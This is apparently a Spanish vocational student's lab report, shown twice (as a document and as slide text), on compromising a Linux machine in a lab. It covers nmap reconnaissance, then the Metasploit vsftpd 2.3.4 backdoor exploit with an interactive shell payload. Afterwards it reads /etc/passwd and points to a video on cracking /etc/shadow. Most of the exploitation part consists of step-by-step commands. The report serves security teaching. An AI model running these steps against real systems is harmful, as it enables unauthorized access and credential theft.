Miguel Ángel Marchal Barrera
COLEGIO CIUDAD DE LOS MUCHACHOS SISTEMAS MICROINFORMÁTICOS Y REDES CURSO 2016/2017
EXPLOTACIÓN SISTEMA OPERATIVO
PÁGINA 1|9
MIGUEL ÁNGELMARCHAL BARRERA 2SMR C.MUCHACHOS
IDENTIFICACIÓN DEL OBJETIVO
Comprobar si tenemosacceso a la máquina que queremosatacar
Comandoping+ direccióndel interfazde red
Abrirel terminal de Kali-linux
Introducir:ping192.168.1.104 (esla direccióndel equipoaatacar)
Si tenemosconectividad nose perderáningúnpaquete enviado
Detectar los equiposactivos de la red
Comandonmap –sP + direcciónde red
Introducir:nmap–sP 192.168.1.0/24
Escaneala red enbusca de losequiposque estánfuncionandoenlaLAN mostrandolasMAC y
lasdireccionesIPde cada equipo.
PÁGINA 2|9
MIGUEL ÁNGELMARCHAL BARRERA 2SMR C.MUCHACHOS
ANÁLISIS DE PUERTOS Y SERVICIOS
Identificaciónde puertosque usa la máquina
Comandonmap –sT -O+ direccióndel interfazde red
Introducir:nmap –sT -O192.168.1.104
Muestra lospuertosque utilizanlamáquinay laversióndel sistemaoperativo
PÁGINA 3|9
MIGUEL ÁNGELMARCHAL BARRERA 2SMR C.MUCHACHOS
Comprobar versionesde servicios
Comandonmap –sT –sV direccióndel interfazde red
Introducir:nmap –sT –sV 192.168.1.104
Muestra puertosabiertos,serviciosyversionesde éstos.
Comprobar versionesde serviciosmediante comando telnet
Comandotelnet+IP del interfazde red+ puertoabierto
Introducir:telnet192.168.1.104 21
Muestra laversióndel serviciodelpuertoseleccionado parasabersi esposible que exista
algunavulnerabilidadenlaversión.
PÁGINA 4|9
MIGUEL ÁNGELMARCHAL BARRERA 2SMR C.MUCHACHOS
Conexióna través del servicioseleccionado
Comandotelnet,FTPySSH
Accesocon comandotelnet
Comandotelnet+IP interfazde red
Introducir:telnet192.168.1.104
Accedemosala máquinaymuestrael interfazde textopidiendologin desconocido.
Accesocon comandoFTP
Comandoftp + IPinterfazde red
Introducir:ftp192.168.1.104
Accesomediante servicioftppidiendocontraseña desconocida.
Accesocon comandoSSH
Comandossh + IP interfazde red
Introducir:ssh 192.168.1.104
Accesomediante serviciosshpidiendocontraseña desconocida.
PÁGINA 5|9
MIGUEL ÁNGELMARCHAL BARRERA 2SMR C.MUCHACHOS
ANÁLISIS DE VULNERABILIDADES
Herramientametasploit
Iniciarla herramientaintroduciendo:msfconsole
Comprobarlos exploitsde laversiónque puedenhacervulnerable el accesoporel servicio
Introducircomando:searchftp
Lista de exploitsque podemosutilizarparaaccederde modo remotoa la máquinaque
queremosatacar.
PÁGINA 6|9
MIGUEL ÁNGELMARCHAL BARRERA 2SMR C.MUCHACHOS
EXPLOTACIÓN DE VULNERABILIDADES
Localizamosel xploitpreparadoparaatacar
Este exploitnosinformaque es excelente parausar.
Para usar el xploit
Comandouse + direccióndel exploit
Introducir:use exploit/unix/ftp/vsftpd_234_backdoor
Comprobarla configuraciónde parámetros
Comandoshowoptions
Introducir:showoptions
Se compruebasi se necesitaalgunaconfiguraciónadicional parausarel exploit,necesitaremos
configurarel RHOST asignandolaIPde lamáquinaatacada.
RHOST: Remote Host.
RPORT: Remote Port.
ConfiguraciónRHOST
ComandosetRHOST + direccióndel interfazde red
Introducir:setRHOST 192.168.1.104
PÁGINA 7|9
MIGUEL ÁNGELMARCHAL BARRERA 2SMR C.MUCHACHOS
Buscar payloaddisponible
Comandoshowpayloads
Introducir:showpayloads
Muestra el disponible
Utilizarel payloaddisponible
Comandosetpayload + payloaddisponible
Introducir:setpayloadcmd/unix/interact
Accederremotamente alamáquina
Comandoexploit
Introducior:exploit
Accesopermitidoremotoalamáquinaatacada.
Con este últimocomandohabremosaccedidoalamáquinafinalmente,sinnecesidadde login
de ningúntipoy se podrá accedera losdirectoriosyarchivosde maneratransparante.
PÁGINA 8|9
MIGUEL ÁNGELMARCHAL BARRERA 2SMR C.MUCHACHOS
POST-EXPLOTACIÓN DEL SISTEMA
Uso de comandoscomosi estuviéramosenlamismamáquina.
Comandols
Directoriosde laraíz de la máquinaatacada.
PÁGINA 9|9
MIGUEL ÁNGELMARCHAL BARRERA 2SMR C.MUCHACHOS
Obtenciónde contraseña
Comandocat
Introducir:cat etc/passwd
La estructuraes:
<nombre>,<password><uid>, <gid>,<descripción opcional> <carpeta>, <shell>
<nombre>: Nombre de usuario.
<password>: Si es igual a “x” la contraseña está almacenada en /etc/shadow, si es igual a “!” el
usuario está bloqueado y si es igual a “!!” no tiene contraseña.
<uid>: Número de identificador, para root 0, para los demás un número entre 1 y 65535.
<gid>: Grupo al que está asignado.
<descripción opcional>: Descripción añadida al perfil de usuario.
<carpeta>: Carpeta de inicio de usuario de cada usuario.
<shell>: Intérprete de línea de comandos de Linux.
Con esto no descifraremos la contraseña, sólo veremos los usuarios configurados, ésta está
alojada en etc/shadowy está encriptada, para ello existen herramientas y tutoriales paso a
paso para descifrarlas, en este link se explica cómo.
https://www.youtube.com/watch?v=DntHkcbq-wY

Explotación sistema operativo

  • 1.
    Miguel Ángel MarchalBarrera COLEGIO CIUDAD DE LOS MUCHACHOS SISTEMAS MICROINFORMÁTICOS Y REDES CURSO 2016/2017 EXPLOTACIÓN SISTEMA OPERATIVO
  • 2.
    PÁGINA 1|9 MIGUEL ÁNGELMARCHALBARRERA 2SMR C.MUCHACHOS IDENTIFICACIÓN DEL OBJETIVO Comprobar si tenemosacceso a la máquina que queremosatacar Comandoping+ direccióndel interfazde red Abrirel terminal de Kali-linux Introducir:ping192.168.1.104 (esla direccióndel equipoaatacar) Si tenemosconectividad nose perderáningúnpaquete enviado Detectar los equiposactivos de la red Comandonmap –sP + direcciónde red Introducir:nmap–sP 192.168.1.0/24 Escaneala red enbusca de losequiposque estánfuncionandoenlaLAN mostrandolasMAC y lasdireccionesIPde cada equipo.
  • 3.
    PÁGINA 2|9 MIGUEL ÁNGELMARCHALBARRERA 2SMR C.MUCHACHOS ANÁLISIS DE PUERTOS Y SERVICIOS Identificaciónde puertosque usa la máquina Comandonmap –sT -O+ direccióndel interfazde red Introducir:nmap –sT -O192.168.1.104 Muestra lospuertosque utilizanlamáquinay laversióndel sistemaoperativo
  • 4.
    PÁGINA 3|9 MIGUEL ÁNGELMARCHALBARRERA 2SMR C.MUCHACHOS Comprobar versionesde servicios Comandonmap –sT –sV direccióndel interfazde red Introducir:nmap –sT –sV 192.168.1.104 Muestra puertosabiertos,serviciosyversionesde éstos. Comprobar versionesde serviciosmediante comando telnet Comandotelnet+IP del interfazde red+ puertoabierto Introducir:telnet192.168.1.104 21 Muestra laversióndel serviciodelpuertoseleccionado parasabersi esposible que exista algunavulnerabilidadenlaversión.
  • 5.
    PÁGINA 4|9 MIGUEL ÁNGELMARCHALBARRERA 2SMR C.MUCHACHOS Conexióna través del servicioseleccionado Comandotelnet,FTPySSH Accesocon comandotelnet Comandotelnet+IP interfazde red Introducir:telnet192.168.1.104 Accedemosala máquinaymuestrael interfazde textopidiendologin desconocido. Accesocon comandoFTP Comandoftp + IPinterfazde red Introducir:ftp192.168.1.104 Accesomediante servicioftppidiendocontraseña desconocida. Accesocon comandoSSH Comandossh + IP interfazde red Introducir:ssh 192.168.1.104 Accesomediante serviciosshpidiendocontraseña desconocida.
  • 6.
    PÁGINA 5|9 MIGUEL ÁNGELMARCHALBARRERA 2SMR C.MUCHACHOS ANÁLISIS DE VULNERABILIDADES Herramientametasploit Iniciarla herramientaintroduciendo:msfconsole Comprobarlos exploitsde laversiónque puedenhacervulnerable el accesoporel servicio Introducircomando:searchftp Lista de exploitsque podemosutilizarparaaccederde modo remotoa la máquinaque queremosatacar.
  • 7.
    PÁGINA 6|9 MIGUEL ÁNGELMARCHALBARRERA 2SMR C.MUCHACHOS EXPLOTACIÓN DE VULNERABILIDADES Localizamosel xploitpreparadoparaatacar Este exploitnosinformaque es excelente parausar. Para usar el xploit Comandouse + direccióndel exploit Introducir:use exploit/unix/ftp/vsftpd_234_backdoor Comprobarla configuraciónde parámetros Comandoshowoptions Introducir:showoptions Se compruebasi se necesitaalgunaconfiguraciónadicional parausarel exploit,necesitaremos configurarel RHOST asignandolaIPde lamáquinaatacada. RHOST: Remote Host. RPORT: Remote Port. ConfiguraciónRHOST ComandosetRHOST + direccióndel interfazde red Introducir:setRHOST 192.168.1.104
  • 8.
    PÁGINA 7|9 MIGUEL ÁNGELMARCHALBARRERA 2SMR C.MUCHACHOS Buscar payloaddisponible Comandoshowpayloads Introducir:showpayloads Muestra el disponible Utilizarel payloaddisponible Comandosetpayload + payloaddisponible Introducir:setpayloadcmd/unix/interact Accederremotamente alamáquina Comandoexploit Introducior:exploit Accesopermitidoremotoalamáquinaatacada. Con este últimocomandohabremosaccedidoalamáquinafinalmente,sinnecesidadde login de ningúntipoy se podrá accedera losdirectoriosyarchivosde maneratransparante.
  • 9.
    PÁGINA 8|9 MIGUEL ÁNGELMARCHALBARRERA 2SMR C.MUCHACHOS POST-EXPLOTACIÓN DEL SISTEMA Uso de comandoscomosi estuviéramosenlamismamáquina. Comandols Directoriosde laraíz de la máquinaatacada.
  • 10.
    PÁGINA 9|9 MIGUEL ÁNGELMARCHALBARRERA 2SMR C.MUCHACHOS Obtenciónde contraseña Comandocat Introducir:cat etc/passwd La estructuraes: <nombre>,<password><uid>, <gid>,<descripción opcional> <carpeta>, <shell> <nombre>: Nombre de usuario. <password>: Si es igual a “x” la contraseña está almacenada en /etc/shadow, si es igual a “!” el usuario está bloqueado y si es igual a “!!” no tiene contraseña. <uid>: Número de identificador, para root 0, para los demás un número entre 1 y 65535. <gid>: Grupo al que está asignado. <descripción opcional>: Descripción añadida al perfil de usuario. <carpeta>: Carpeta de inicio de usuario de cada usuario. <shell>: Intérprete de línea de comandos de Linux. Con esto no descifraremos la contraseña, sólo veremos los usuarios configurados, ésta está alojada en etc/shadowy está encriptada, para ello existen herramientas y tutoriales paso a paso para descifrarlas, en este link se explica cómo. https://www.youtube.com/watch?v=DntHkcbq-wY